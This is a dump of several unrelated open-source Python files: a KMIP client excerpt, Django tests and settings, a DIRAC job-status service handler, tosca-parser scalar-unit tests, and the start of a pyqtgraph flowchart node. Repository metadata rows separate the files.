operation = Operation(OperationEnum.LOCATE)
payload = payloads.LocateRequestPayload(
maximum_items=maximum_items,
offset_items=offset_items,
storage_status_mask=storage_status_mask,
object_group_member=object_group_member,
attributes=attributes
)
batch_item = messages.RequestBatchItem(
operation=operation,
request_payload=payload
)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
uuids = None
else:
uuids = payload.unique_identifiers
result = LocateResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
uuids)
return result
def _mac(self,
data,
unique_identifier=None,
cryptographic_parameters=None,
credential=None):
operation = Operation(OperationEnum.MAC)
req_pl = payloads.MACRequestPayload(
unique_identifier=attr.UniqueIdentifier(unique_identifier),
cryptographic_parameters=cryptographic_parameters,
data=objects.Data(data))
batch_item = messages.RequestBatchItem(operation=operation,
request_payload=req_pl)
message = self._build_request_message(credential, [batch_item])
self._send_message(message)
message = messages.ResponseMessage()
data = self._receive_message()
message.read(data, self.kmip_version)
batch_items = message.batch_items
batch_item = batch_items[0]
payload = batch_item.response_payload
if payload is None:
payload_unique_identifier = None
payload_mac_data = None
else:
payload_unique_identifier = payload.unique_identifier
payload_mac_data = payload.mac_data
result = MACResult(batch_item.result_status,
batch_item.result_reason,
batch_item.result_message,
payload_unique_identifier,
payload_mac_data)
return result
# TODO (peter-hamilton) Augment to handle device credentials
def _build_credential(self):
if (self.username is None) and (self.password is None):
return None
if self.username is None:
raise ValueError('cannot build credential, username is None')
if self.password is None:
raise ValueError('cannot build credential, password is None')
credential_type = CredentialType.USERNAME_AND_PASSWORD
credential_value = {'Username': self.username,
'Password': self.password}
credential = self.credential_factory.create_credential(
credential_type,
credential_value)
return credential
def _build_protocol_version(self):
if self.kmip_version == enums.KMIPVersion.KMIP_1_0:
return ProtocolVersion(1, 0)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_1:
return ProtocolVersion(1, 1)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_2:
return ProtocolVersion(1, 2)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_3:
return ProtocolVersion(1, 3)
elif self.kmip_version == enums.KMIPVersion.KMIP_1_4:
return ProtocolVersion(1, 4)
else:
return ProtocolVersion(2, 0)
def _build_request_message(self, credential, batch_items):
protocol_version = self._build_protocol_version()
if credential is None:
credential = self._build_credential()
authentication = None
if credential is not None:
authentication = Authentication([credential])
batch_count = BatchCount(len(batch_items))
req_header = messages.RequestHeader(protocol_version=protocol_version,
authentication=authentication,
batch_count=batch_count)
return messages.RequestMessage(request_header=req_header,
batch_items=batch_items)
def _send_message(self, message):
stream = BytearrayStream()
message.write(stream, self.kmip_version)
self.protocol.write(stream.buffer)
def _receive_message(self):
return self.protocol.read()
def _send_and_receive_message(self, request):
self._send_message(request)
response = messages.ResponseMessage()
data = self._receive_message()
response.read(data, self.kmip_version)
return response
def _set_variables(self, host, port, keyfile, certfile,
cert_reqs, ssl_version, ca_certs,
do_handshake_on_connect, suppress_ragged_eofs,
username, password, timeout, config_file):
conf = ConfigHelper(config_file)
# TODO: set this to a host list
self.host_list_str = conf.get_valid_value(
host, self.config, 'host', conf.DEFAULT_HOST)
self.host_list = self._build_host_list(self.host_list_str)
self.host = self.host_list[0]
self.port = int(conf.get_valid_value(
port, self.config, 'port', conf.DEFAULT_PORT))
self.keyfile = conf.get_valid_value(
keyfile, self.config, 'keyfile', None)
self.certfile = conf.get_valid_value(
certfile, self.config, 'certfile', None)
self.cert_reqs = getattr(ssl, conf.get_valid_value(
cert_reqs, self.config, 'cert_reqs', 'CERT_REQUIRED'))
self.ssl_version = getattr(ssl, conf.get_valid_value(
ssl_version, self.config, 'ssl_version', conf.DEFAULT_SSL_VERSION))
self.ca_certs = conf.get_valid_value(
ca_certs, self.config, 'ca_certs', conf.DEFAULT_CA_CERTS)
if conf.get_valid_value(
do_handshake_on_connect, self.config,
'do_handshake_on_connect', 'True') == 'True':
self.do_handshake_on_connect = True
else:
self.do_handshake_on_connect = False
if conf.get_valid_value(
suppress_ragged_eofs, self.config,
'suppress_ragged_eofs', 'True') == 'True':
self.suppress_ragged_eofs = True
else:
self.suppress_ragged_eofs = False
self.username = conf.get_valid_value(
username, self.config, 'username', conf.DEFAULT_USERNAME)
self.password = conf.get_valid_value(
password, self.config, 'password', conf.DEFAULT_PASSWORD)
self.timeout = int(conf.get_valid_value(
timeout, self.config, 'timeout', conf.DEFAULT_TIMEOUT))
if self.timeout < 0:
self.logger.warning(
"Negative timeout value specified, "
"resetting to safe default of {0} seconds".format(
conf.DEFAULT_TIMEOUT))
self.timeout = conf.DEFAULT_TIMEOUT
def _build_host_list(self, host_list_str):
'''
    This internal function takes the comma-separated host string from the
    config file and turns it into a list of host strings.
    :return: list of host strings
'''
host_list = []
if isinstance(host_list_str, str):
host_list = host_list_str.replace(' ', '').split(',')
else:
raise TypeError("Unrecognized variable type provided for host "
"list string. 'String' type expected but '" +
str(type(host_list_str)) + "' received")
return host_list
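  # Illustrative example of the parsing above (not part of the original
  # source; the host names are hypothetical): a config value of
  # "kmip1.example.com, kmip2.example.com" yields
  # ['kmip1.example.com', 'kmip2.example.com'], and _set_variables() then
  # uses the first entry as self.host.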
| apache-2.0 | -8,223,827,019,652,129,000 | 39.915058 | 79 | 0.583467 | false |
gatsinski/kindergarten-management-system | kindergarten_management_system/kms/contrib/kindergartens/tests.py | 1 | 1137 | from django.test import TestCase
from .models import Kindergarten, KindergartenType, City
CityData = {
'name': 'City name'
}
KindergartenTypeData = {
'name': 'Kindergarten type name'
}
KindergartenData = {
'name': 'Test Kindergarten Name',
'address': 'Test Kindergarten Address'
}
class ModelTests(TestCase):
def setUp(self):
self.city = City.objects.create(**CityData)
self.kindergarten_type = KindergartenType.objects.\
create(**KindergartenTypeData)
self.kindergarten = Kindergarten.objects.\
create(**KindergartenData,
city=self.city,
type=self.kindergarten_type)
def test_city_creation(self):
self.assertTrue(City.objects.filter(**CityData).exists())
self.assertEqual(self.city, City.objects.get(**CityData))
def test_kindergarten_type_creation(self):
        queryset = KindergartenType.objects.filter(**KindergartenTypeData)
        self.assertTrue(queryset.exists())
        kindergarten_type = KindergartenType.objects.get(**KindergartenTypeData)
        self.assertEqual(self.kindergarten_type, kindergarten_type)
| gpl-3.0 | 2,340,813,184,942,888,400 | 28.921053 | 72 | 0.670185 | false |
fstagni/DIRAC | WorkloadManagementSystem/Service/JobStateUpdateHandler.py | 1 | 13370 | """ JobStateUpdateHandler is the implementation of the Job State updating
    service in the DISET framework.
    The following methods are available in the Service interface:
setJobStatus()
"""
from __future__ import absolute_import
import six
from six.moves import range
__RCSID__ = "$Id$"
import time
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.DISET.RequestHandler import RequestHandler
from DIRAC.Core.Utilities import Time
from DIRAC.ConfigurationSystem.Client.Helpers.Operations import Operations
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
from DIRAC.WorkloadManagementSystem.DB.ElasticJobDB import ElasticJobDB
from DIRAC.WorkloadManagementSystem.DB.JobLoggingDB import JobLoggingDB
# This is a global instance of the JobDB class
jobDB = False
logDB = False
elasticJobDB = False
JOB_FINAL_STATES = ['Done', 'Completed', 'Failed']
def initializeJobStateUpdateHandler(serviceInfo):
global jobDB
global logDB
jobDB = JobDB()
logDB = JobLoggingDB()
return S_OK()
class JobStateUpdateHandler(RequestHandler):
def initialize(self):
"""
    The useESForJobParametersFlag option (True/False), read from the
    Operations section of the DIRAC configuration (dirac.cfg), determines
    whether job parameters are stored in ElasticSearch or in MySQL.
"""
global elasticJobDB
useESForJobParametersFlag = Operations().getValue('/Services/JobMonitoring/useESForJobParametersFlag', False)
if useESForJobParametersFlag:
elasticJobDB = ElasticJobDB()
self.log.verbose("Using ElasticSearch for JobParameters")
return S_OK()
###########################################################################
types_updateJobFromStager = [[six.string_types, int], six.string_types]
def export_updateJobFromStager(self, jobID, status):
""" Simple call back method to be used by the stager. """
if status == 'Done':
jobStatus = 'Checking'
minorStatus = 'JobScheduling'
elif status == 'Failed':
jobStatus = 'Failed'
minorStatus = 'Staging input files failed'
else:
return S_ERROR("updateJobFromStager: %s status not known." % status)
infoStr = None
trials = 10
for i in range(trials):
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_OK('No Matching Job')
status = result['Value']['Status']
if status == 'Staging':
if i:
infoStr = "Found job in Staging after %d seconds" % i
break
time.sleep(1)
if status != 'Staging':
return S_OK('Job is not in Staging after %d seconds' % trials)
result = self.__setJobStatus(int(jobID), jobStatus, minorStatus, 'StagerSystem', None)
if not result['OK']:
if result['Message'].find('does not exist') != -1:
return S_OK()
if infoStr:
return S_OK(infoStr)
return result
###########################################################################
types_setJobStatus = [[six.string_types, int]]
def export_setJobStatus(self, jobID, status='', minorStatus='', source='Unknown', datetime=None):
""" Set the major and minor status for job specified by its JobId.
Set optionally the status date and source component which sends the
status information.
"""
return self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
###########################################################################
types_setJobsStatus = [list]
def export_setJobsStatus(self, jobIDs, status='', minorStatus='', source='Unknown', datetime=None):
""" Set the major and minor status for job specified by its JobId.
Set optionally the status date and source component which sends the
status information.
"""
for jobID in jobIDs:
self.__setJobStatus(int(jobID), status, minorStatus, source, datetime)
return S_OK()
def __setJobStatus(self, jobID, status, minorStatus, source, datetime):
""" update the job status. """
result = jobDB.setJobStatus(jobID, status, minorStatus)
if not result['OK']:
return result
if status in JOB_FINAL_STATES:
result = jobDB.setEndExecTime(jobID)
if status == 'Running' and minorStatus == 'Application':
result = jobDB.setStartExecTime(jobID)
result = jobDB.getJobAttributes(jobID, ['Status', 'MinorStatus'])
if not result['OK']:
return result
if not result['Value']:
return S_ERROR('Job %d does not exist' % int(jobID))
status = result['Value']['Status']
minorStatus = result['Value']['MinorStatus']
if datetime:
result = logDB.addLoggingRecord(jobID, status, minorStatus, datetime, source)
else:
result = logDB.addLoggingRecord(jobID, status, minorStatus, source=source)
return result
###########################################################################
types_setJobStatusBulk = [[six.string_types, int], dict]
def export_setJobStatusBulk(self, jobID, statusDict):
""" Set various status fields for job specified by its JobId.
Set only the last status in the JobDB, updating all the status
logging information in the JobLoggingDB. The statusDict has datetime
as a key and status information dictionary as values
"""
status = ""
minor = ""
application = ""
appCounter = ""
endDate = ''
startDate = ''
startFlag = ''
jobID = int(jobID)
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_ERROR('No Matching Job')
new_status = result['Value']['Status']
if new_status == "Stalled":
status = 'Running'
# Get the latest WN time stamps of status updates
result = logDB.getWMSTimeStamps(int(jobID))
if not result['OK']:
return result
lastTime = max([float(t) for s, t in result['Value'].items() if s != 'LastTime'])
lastTime = Time.toString(Time.fromEpoch(lastTime))
# Get the last status values
dates = sorted(statusDict)
# We should only update the status if its time stamp is more recent than the last update
for date in [date for date in dates if date >= lastTime]:
sDict = statusDict[date]
if sDict['Status']:
status = sDict['Status']
if status in JOB_FINAL_STATES:
endDate = date
if status == "Running":
startFlag = 'Running'
if sDict['MinorStatus']:
minor = sDict['MinorStatus']
if minor == "Application" and startFlag == 'Running':
startDate = date
if sDict['ApplicationStatus']:
application = sDict['ApplicationStatus']
counter = sDict.get('ApplicationCounter')
if counter:
appCounter = counter
attrNames = []
attrValues = []
if status:
attrNames.append('Status')
attrValues.append(status)
if minor:
attrNames.append('MinorStatus')
attrValues.append(minor)
if application:
attrNames.append('ApplicationStatus')
attrValues.append(application)
if appCounter:
attrNames.append('ApplicationCounter')
attrValues.append(appCounter)
result = jobDB.setJobAttributes(jobID, attrNames, attrValues, update=True)
if not result['OK']:
return result
if endDate:
result = jobDB.setEndExecTime(jobID, endDate)
if startDate:
result = jobDB.setStartExecTime(jobID, startDate)
# Update the JobLoggingDB records
for date in dates:
sDict = statusDict[date]
status = sDict['Status']
if not status:
status = 'idem'
minor = sDict['MinorStatus']
if not minor:
minor = 'idem'
application = sDict['ApplicationStatus']
if not application:
application = 'idem'
source = sDict['Source']
result = logDB.addLoggingRecord(jobID, status, minor, application, date, source)
if not result['OK']:
return result
return S_OK()
###########################################################################
types_setJobSite = [[six.string_types, int], six.string_types]
def export_setJobSite(self, jobID, site):
"""Allows the site attribute to be set for a job specified by its jobID.
"""
result = jobDB.setJobAttribute(int(jobID), 'Site', site)
return result
###########################################################################
types_setJobFlag = [[six.string_types, int], six.string_types]
def export_setJobFlag(self, jobID, flag):
""" Set job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'True')
return result
###########################################################################
types_unsetJobFlag = [[six.string_types, int], six.string_types]
def export_unsetJobFlag(self, jobID, flag):
""" Unset job flag for job with jobID
"""
result = jobDB.setJobAttribute(int(jobID), flag, 'False')
return result
###########################################################################
types_setJobApplicationStatus = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobApplicationStatus(self, jobID, appStatus, source='Unknown'):
""" Set the application status for job specified by its JobId.
"""
result = jobDB.getJobAttributes(int(jobID), ['Status', 'MinorStatus'])
if not result['OK']:
return result
if not result['Value']:
# if there is no matching Job it returns an empty dictionary
return S_ERROR('No Matching Job')
status = result['Value']['Status']
if status == "Stalled" or status == "Matched":
newStatus = 'Running'
else:
newStatus = status
minorStatus = result['Value']['MinorStatus']
result = jobDB.setJobStatus(int(jobID), status=newStatus, minor=minorStatus, application=appStatus)
if not result['OK']:
return result
result = logDB.addLoggingRecord(int(jobID), newStatus, minorStatus, appStatus, source=source)
return result
###########################################################################
types_setJobParameter = [[six.string_types, int], six.string_types, six.string_types]
def export_setJobParameter(self, jobID, name, value):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
if elasticJobDB:
return elasticJobDB.setJobParameter(int(jobID), name, value)
return jobDB.setJobParameter(int(jobID), name, value)
###########################################################################
types_setJobsParameter = [dict]
def export_setJobsParameter(self, jobsParameterDict):
""" Set arbitrary parameter specified by name/value pair
for job specified by its JobId
"""
for jobID in jobsParameterDict:
if elasticJobDB:
res = elasticJobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to elasticJobDB', res['Message'])
else:
res = jobDB.setJobParameter(jobID,
str(jobsParameterDict[jobID][0]),
str(jobsParameterDict[jobID][1]))
if not res['OK']:
self.log.error('Failed to add Job Parameter to MySQL', res['Message'])
return S_OK()
###########################################################################
types_setJobParameters = [[six.string_types, int], list]
def export_setJobParameters(self, jobID, parameters):
""" Set arbitrary parameters specified by a list of name/value pairs
for job specified by its JobId
"""
result = jobDB.setJobParameters(int(jobID), parameters)
if not result['OK']:
return S_ERROR('Failed to store some of the parameters')
return S_OK('All parameters stored for job')
###########################################################################
types_sendHeartBeat = [[six.string_types, int], dict, dict]
def export_sendHeartBeat(self, jobID, dynamicData, staticData):
""" Send a heart beat sign of life for a job jobID
"""
result = jobDB.setHeartBeatData(int(jobID), staticData, dynamicData)
if not result['OK']:
self.log.warn('Failed to set the heart beat data', 'for job %d ' % int(jobID))
# Restore the Running status if necessary
result = jobDB.getJobAttributes(jobID, ['Status'])
if not result['OK']:
return result
if not result['Value']:
return S_ERROR('Job %d not found' % jobID)
status = result['Value']['Status']
if status == "Stalled" or status == "Matched":
result = jobDB.setJobAttribute(jobID, 'Status', 'Running', True)
if not result['OK']:
self.log.warn('Failed to restore the job status to Running')
jobMessageDict = {}
result = jobDB.getJobCommand(int(jobID))
if result['OK']:
jobMessageDict = result['Value']
if jobMessageDict:
for key, _value in jobMessageDict.items():
result = jobDB.setJobCommandStatus(int(jobID), key, 'Sent')
return S_OK(jobMessageDict)
| gpl-3.0 | -2,354,184,175,611,544,600 | 33.194373 | 113 | 0.614211 | false |
mcallaghan/tmv | BasicBrowser/BasicBrowser/settings.py | 1 | 4724 | """
Django settings for BasicBrowser project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# SECURITY WARNING: keep the secret key used in production secret!
#SECRET_KEY = '@-*jt+re$+w6i1nd53x&p5e&#@rv##*yv_fkebk_1%0z!=#3q4'
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
MAINTENANCE = False
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'scoping.apps.ScopingConfig',
'tmv_app.apps.TmvAppConfig',
'dal',
'dal_select2',
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.postgres',
'django.contrib.gis',
'django_extensions',
'psqlextra',
'rest_framework',
'debug_toolbar',
'cities',
'twitter',
'parliament',
'django_tables2',
'lotto',
'django_filters',
'bootstrap4',
'crispy_forms',
]
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 50,
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',)
}
MIDDLEWARE = [
#'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
#'django.middleware.cache.FetchFromCacheMiddleware',
]
ROOT_URLCONF = 'BasicBrowser.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'BasicBrowser/templates/BasicBrowser')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'BasicBrowser.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/var/www/tmv/BasicBrowser/static/'
#MEDIA_URL = '/pdfs/'
#MEDIA_ROOT = '/queries/pdfs/' #os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_ROOT = '/var/www/tmv/BasicBrowser/media'
QUERY_DIR = '/usr/local/apsis/queries/'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/var/tmp/django_cache',
'TIMEOUT': 60,
'OPTIONS': {
'MAX_ENTRIES': 1000
}
}
}
## CELERY SETTINGS
BROKER_URL = 'redis://localhost:6379/0'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
from .settings_local import *
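# Illustrative sketch of what settings_local.py is expected to provide (not
# part of the original file; all values are placeholders, and the PostGIS
# backend is only a guess based on the GeoDjango/psqlextra apps above):
#
#   DEBUG = True
#   SECRET_KEY = 'replace-me-with-a-long-random-string'
#   DATABASES = {
#       'default': {
#           'ENGINE': 'django.contrib.gis.db.backends.postgis',
#           'NAME': 'tmv_app',
#           'USER': 'tmv',
#           'PASSWORD': 'replace-me',
#           'HOST': 'localhost',
#       }
#   }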
| gpl-3.0 | -1,989,559,241,619,876,600 | 25.244444 | 91 | 0.678662 | false |
spzala/tosca-parser | parser/tests/test_scalarunit.py | 1 | 12137 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from parser.common import exception
from parser.elements.types.scalarunit import ScalarUnit_Frequency
from parser.elements.types.scalarunit import ScalarUnit_Size
from parser.elements.types.scalarunit import ScalarUnit_Time
from parser.elements.templates.nodetemplate import NodeTemplate
from parser.tests.base import TestCase
from parser.utils import yamlparser
class ScalarUnitPositiveTest(TestCase):
scenarios = [
(
# tpl_snippet with mem_size given as number+space+MB
'mem_size_is_number_Space_MB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1024 MB
''',
property='mem_size',
expected='1024 MB')
),
(
# tpl_snippet with mem_size given as number+spaces+GB
'mem_size_is_number_Space_GB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1 GB
''',
property='mem_size',
expected='1 GB')
),
(
# tpl_snippet with mem_size given as number+tiB
            'mem_size_is_number_NoSpace_tiB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1tiB
''',
property='mem_size',
expected='1tiB')
),
(
# tpl_snippet with mem_size given as number+Spaces+GIB
            'mem_size_is_number_Spaces_GIB',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1 GIB
''',
property='mem_size',
expected='1 GIB')
),
(
# tpl_snippet with mem_size given as number+Space+tib
            'mem_size_is_number_Space_tib',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
mem_size: 1 tib
''',
property='mem_size',
expected='1 tib')
),
(
'cpu_frequency_is_float_Space_GHz',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
cpu_frequency: 2.5 GHz
''',
property='cpu_frequency',
expected='2.5 GHz')
),
(
'cpu_frequency_is_float_Space_MHz',
dict(tpl_snippet='''
server:
type: tosca.nodes.Compute
capabilities:
host:
properties:
cpu_frequency: 800 MHz
''',
property='cpu_frequency',
expected='800 MHz')
),
]
def test_scenario_scalar_unit_positive(self):
tpl = self.tpl_snippet
nodetemplates = yamlparser.simple_parse(tpl)
nodetemplate = NodeTemplate('server', nodetemplates)
props = nodetemplate.get_capability('host').get_properties()
prop_name = self.property
if props and prop_name in props.keys():
prop = props[prop_name]
self.assertIsNone(prop.validate())
resolved = prop.value
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitSizePositive(TestCase):
scenarios = [
( # Note that (1 TB) / (1 GB) = 1000
'Input is TB, user input is GB',
dict(InputMemSize='1 TB',
UserInputUnit='gB',
expected=1000)
),
( # Note that (1 Tib)/ (1 GB) = 1099
'Input is TiB, user input is GB',
dict(InputMemSize='1 TiB',
UserInputUnit='gB',
expected=1099.511627776)
),
]
def test_scenario_get_num_from_scalar_unit_size(self):
resolved = (ScalarUnit_Size(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
self.assertEqual(resolved, self.expected)
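    # Worked arithmetic behind the expected values above (added for clarity,
    # not part of the original source):
    #   1 TB  = 10**12 B, 1 GB = 10**9 B   ->  1 TB / 1 GB = 1000
    #   1 TiB = 2**40 B = 1099511627776 B  ->  1 TiB / 1 GB = 1099.511627776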
class GetNumFromScalarUnitFrequencyPositive(TestCase):
scenarios = [
( # Note that (1 GHz) / (1 Hz) = 1000000000
'Input is GHz, user input is Hz',
dict(InputMemSize='1 GHz',
UserInputUnit='Hz',
expected=1000000000)
),
(
'Input is GHz, user input is Hz',
dict(InputMemSize='2.4 GHz',
UserInputUnit='Hz',
expected=2400000000)
),
( # Note that (1 GHz)/ (1 MHz) = 1000
'Input is MHz, user input is GHz',
dict(InputMemSize='800 MHz',
UserInputUnit='GHz',
expected=0.8)
),
(
'Input is GHz, user input is Hz',
dict(InputMemSize='0.9 GHz',
UserInputUnit='MHz',
expected=900)
),
(
'Input is GHz, user input is Hz',
dict(InputMemSize='2.7GHz',
UserInputUnit='MHz',
expected=2700)
),
]
def test_scenario_get_num_from_scalar_unit_frequency(self):
resolved = (ScalarUnit_Frequency(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitTimePositive(TestCase):
scenarios = [
( # Note that (1 s) / (1 ms) = 1000
'Input is 500ms, user input is s',
dict(InputMemSize='500 ms',
UserInputUnit='s',
expected=0.5)
),
( # Note that (1 h)/ (1 s) = 3600
'Input is h, user input is s',
dict(InputMemSize='1 h',
UserInputUnit='s',
expected=3600)
),
( # Note that (1 m)/ (1 s) = 60
'Input is m, user input is s',
dict(InputMemSize='0.5 m',
UserInputUnit='s',
expected=30)
),
( # Note that (1 d)/ (1 h) = 24
'Input is d, user input is h',
dict(InputMemSize='1 d',
UserInputUnit='h',
expected=24)
),
]
def test_scenario_get_num_from_scalar_unit_time(self):
resolved = (ScalarUnit_Time(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
self.assertEqual(resolved, self.expected)
class GetNumFromScalarUnitSizeNegative(TestCase):
InputMemSize = '1 GB'
UserInputUnit = 'qB'
def test_get_num_from_scalar_unit_size_negative(self):
try:
(ScalarUnit_Size(self.InputMemSize).
get_num_from_scalar_unit(self.UserInputUnit))
except Exception as error:
self.assertTrue(isinstance(error, ValueError))
self.assertEqual('input unit "qB" is not a valid unit',
error.__str__())
class GetNumFromScalarUnitFrequencyNegative(TestCase):
InputFrequency = '2.7 GHz'
UserInputUnit = 'Jz'
def test_get_num_from_scalar_unit_frequency_negative(self):
try:
(ScalarUnit_Frequency(self.InputFrequency).
get_num_from_scalar_unit(self.UserInputUnit))
except Exception as error:
self.assertTrue(isinstance(error, ValueError))
self.assertEqual('input unit "Jz" is not a valid unit',
error.__str__())
class GetNumFromScalarUnitTimeNegative(TestCase):
InputTime = '5 ms'
UserInputUnit = 'D'
    def test_get_num_from_scalar_unit_time_negative(self):
try:
(ScalarUnit_Time(self.InputTime).
get_num_from_scalar_unit(self.UserInputUnit))
except Exception as error:
self.assertTrue(isinstance(error, ValueError))
            self.assertEqual('input unit "D" is not a valid unit',
error.__str__())
class ScalarUnitNegativeTest(TestCase):
custom_def_snippet = '''
tosca.my.nodes.Compute:
derived_from: tosca.nodes.Root
properties:
cpu_frequency:
required: no
type: scalar-unit.frequency
constraints:
- greater_or_equal: 0.1 GHz
disk_size:
required: no
type: scalar-unit.size
constraints:
- greater_or_equal: 1 GB
mem_size:
required: no
type: scalar-unit.size
constraints:
- in_range: [1 MiB, 1 GiB]
'''
custom_def = yamlparser.simple_parse(custom_def_snippet)
# disk_size doesn't provide a value, mem_size uses an invalid unit.
def test_invalid_scalar_unit(self):
tpl_snippet = '''
server:
type: tosca.my.nodes.Compute
properties:
cpu_frequency: 50.3.6 GHZ
disk_size: MB
mem_size: 1 QB
'''
nodetemplates = yamlparser.simple_parse(tpl_snippet)
nodetemplate = NodeTemplate('server', nodetemplates, self.custom_def)
for p in nodetemplate.get_properties_objects():
self.assertRaises(ValueError, p.validate)
# disk_size is less than 1 GB, mem_size is not in the required range.
# Note: in the spec, the minimum value of mem_size is 1 MiB (> 1 MB)
def test_constraint_for_scalar_unit(self):
tpl_snippet = '''
server:
type: tosca.my.nodes.Compute
properties:
cpu_frequency: 0.05 GHz
disk_size: 500 MB
mem_size: 1 MB
'''
nodetemplates = yamlparser.simple_parse(tpl_snippet)
nodetemplate = NodeTemplate('server', nodetemplates, self.custom_def)
props = nodetemplate.get_properties()
if 'cpu_frequency' in props.keys():
error = self.assertRaises(exception.ValidationError,
props['cpu_frequency'].validate)
self.assertEqual('cpu_frequency: 0.05 GHz must be greater or '
'equal to "0.1 GHz".', error.__str__())
if 'disk_size' in props.keys():
error = self.assertRaises(exception.ValidationError,
props['disk_size'].validate)
self.assertEqual('disk_size: 500 MB must be greater or '
'equal to "1 GB".', error.__str__())
if 'mem_size' in props.keys():
error = self.assertRaises(exception.ValidationError,
props['mem_size'].validate)
self.assertEqual('mem_size: 1 MB is out of range '
'(min:1 MiB, '
'max:1 GiB).', error.__str__())
| apache-2.0 | -1,158,263,557,762,250,000 | 33.776504 | 78 | 0.510917 | false |
cdd1969/pygwa | lib/flowchart/nodes/n14_overheadplot/node_plot_overheadvsriverwl.py | 1 | 7043 | #!/usr/bin python
# -*- coding: utf-8 -*-
from pyqtgraph.Qt import QtCore
from pyqtgraph import BusyCursor
from lib.functions import plot_pandas
from lib.functions.general import getCallableArgumentList, isNumpyNumeric
